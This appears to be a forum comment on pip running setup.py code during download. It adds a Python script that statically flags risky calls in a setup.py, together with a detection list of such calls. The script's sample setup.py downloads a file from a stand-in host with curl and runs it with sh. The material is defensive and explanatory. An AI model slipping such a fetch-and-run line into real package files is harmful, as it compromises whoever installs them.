This reminds me of a blog post [1] I read before. Pertinent quote:
> Unbeknownst to me, even with --dry-run pip will execute arbitrary code found in the package's setup.py. In fact, merely asking pip to download a package can execute arbitrary code (see pip issues 7325 [2] and 1884 [3] for more details)!
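As an added example (not code from the quoted post, the linked issues, or the pip project): since `pip download` may run `setup.py`, a defender can read an sdist's `setup.py` with Python's `ast` module first, without importing or executing it. The sample `setup.py` below is constructed, and `RISKY_CALLS` is an assumed starting list, not an exhaustive one.

```python
"""Statically triage a setup.py for install-time side effects, without running it."""
import ast

# Constructed sample of the kind of setup.py the quoted issues describe:
# it runs commands as soon as pip builds the sdist. Not a real package.
SAMPLE_SETUP_PY = '''
import os
import subprocess
from setuptools import setup
subprocess.run(["curl", "http://example.invalid/x", "-o", "/tmp/x"])
os.system("sh /tmp/x")
setup(name="demo", version="0.1")
'''

# Assumed list of callees that act at import/build time and deserve a look.
RISKY_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output", "exec", "eval",
    "urllib.request.urlopen", "base64.b64decode",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def find_risky_calls(source):
    """Parse source with ast (never exec'd) and return sorted (line, callee)
    pairs for every call whose dotted name is in RISKY_CALLS.
    Limitation: aliased imports (e.g. 'from subprocess import run as r')
    are not resolved, so treat an empty result as 'nothing obvious', not 'safe'."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in RISKY_CALLS:
                hits.append((node.lineno, name))
    return sorted(hits)


if __name__ == "__main__":
    for line, callee in find_risky_calls(SAMPLE_SETUP_PY):
        print(f"setup.py line {line}: {callee}")
```

Pairing this with `pip download --only-binary=:all:` (which refuses to build sdists) keeps the review step ahead of any execution.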